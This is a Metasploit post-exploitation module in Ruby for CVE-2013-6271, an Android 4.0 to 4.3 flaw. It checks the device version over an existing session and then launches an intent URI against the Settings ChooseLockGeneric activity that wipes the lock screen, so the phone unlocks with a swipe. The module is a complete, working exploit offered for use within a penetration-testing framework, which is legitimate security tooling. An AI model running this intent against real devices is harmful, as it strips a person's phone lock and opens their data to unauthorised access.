GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/android/manage/remove_lock.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Post module for CVE-2013-6271: on Android 4.0 to 4.3 the Settings
# ChooseLockGeneric activity accepts an Intent from any application and clears
# the screen lock. According to the description below the flaw was patched in
# Android 4.4, so updating the device is the mitigation.
class MetasploitModule < Msf::Post
  Rank = NormalRanking

  include Msf::Post::Common
  include Msf::Post::Android::System

  # Registers the module metadata with the framework: name, description,
  # references, supported session types and the declared stability and
  # side-effect notes.
  #
  # @param info [Hash] caller-supplied metadata, merged through update_info
  def initialize(info = {})
    module_info = {
      'Name' => 'Android Settings Remove Device Locks (4.0-4.3)',
      'Description' => %q{
        This module exploits a bug in the Android 4.0 to 4.3 com.android.settings.ChooseLockGeneric class.
        Any unprivileged app can exploit this vulnerability to remove the lockscreen.
        A logic flaw / design error exists in the settings application that allows an Intent from any
        application to clear the screen lock. The user may see that the Settings application has crashed,
        and the phone can then be unlocked by a swipe.
        This vulnerability was patched in Android 4.4.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'CureSec', # discovery
        'timwr' # metasploit module
      ],
      'References' => [
        [ 'CVE', '2013-6271' ],
        [ 'URL', 'http://blog.curesec.com/article/blog/26.html' ],
        [ 'URL', 'http://www.curesec.com/data/advisories/Curesec-2013-1011.pdf' ]
      ],
      'SessionTypes' => [ 'meterpreter', 'shell' ],
      'Platform' => 'android',
      'DisclosureDate' => '2013-10-11',
      # Declared impact. The description says the Settings app may visibly
      # crash, and the device's lock configuration is changed.
      'Notes' => {
        'Stability' => [CRASH_SERVICE_DOWN],
        'SideEffects' => [CONFIG_CHANGES, SCREEN_EFFECTS],
        'Reliability' => []
      },
      'Compat' => {
        'Meterpreter' => {
          'Commands' => %w[
            android_*
          ]
        }
      }
    }

    super(update_info(info, module_info))
  end

  # Reports whether the device behind the session declares an Android release
  # inside the 4.0..4.3 range this module supports.
  #
  # This is only the module's own compatibility gate; it says nothing about
  # whether a given build carries the fix. Judge real devices by patch state
  # (the description states the fix shipped in Android 4.4).
  #
  # @return [Boolean] true when 4.0 <= release <= 4.3, false otherwise
  def is_version_compat?
    props = get_build_prop

    # Sometimes cmd_exec fails to cat build_prop, so the #get_build_prop method returns
    # empty.
    # NOTE(review): presumably fail_with aborts the module here - confirm.
    fail_with(Failure::Unknown, 'Failed to retrieve build.prop, you might need to try again.') if props.empty?

    # NOTE(review): assumes 'ro.build.version.release' is present and parses as
    # a version string; a missing key would pass nil to Rex::Version - confirm.
    release = Rex::Version.new(props['ro.build.version.release'])
    lowest_supported = Rex::Version.new('4.0')
    highest_supported = Rex::Version.new('4.3')

    release >= lowest_supported && release <= highest_supported
  end

  # Module entry point: checks the reported Android release, then asks the
  # session to start the Settings ChooseLockGeneric activity and prints the
  # outcome.
  def run
    unless is_version_compat?
      print_error('This module is only compatible with Android versions 4.0 to 4.3')
      return
    end

    # Intent URI naming the Settings ChooseLockGeneric component, carrying the
    # extras lockscreen.password_type=0 and confirm_credentials=false.
    intent_uri = 'intent:#Intent;launchFlags=0x8000;component=com.android.settings/.ChooseLockGeneric;i.lockscreen.password_type=0;B.confirm_credentials=false;end'

    # A nil return is treated as success; anything else is printed as the
    # failure detail.
    start_failure = session.android.activity_start(intent_uri)
    if start_failure.nil?
      print_good('Intent started, the lock screen should now be a dud.')
      print_good('Go ahead and manually swipe or provide any pin/password/pattern to continue.')
    else
      print_error("The Intent could not be started: #{start_failure}")
    end
  end
end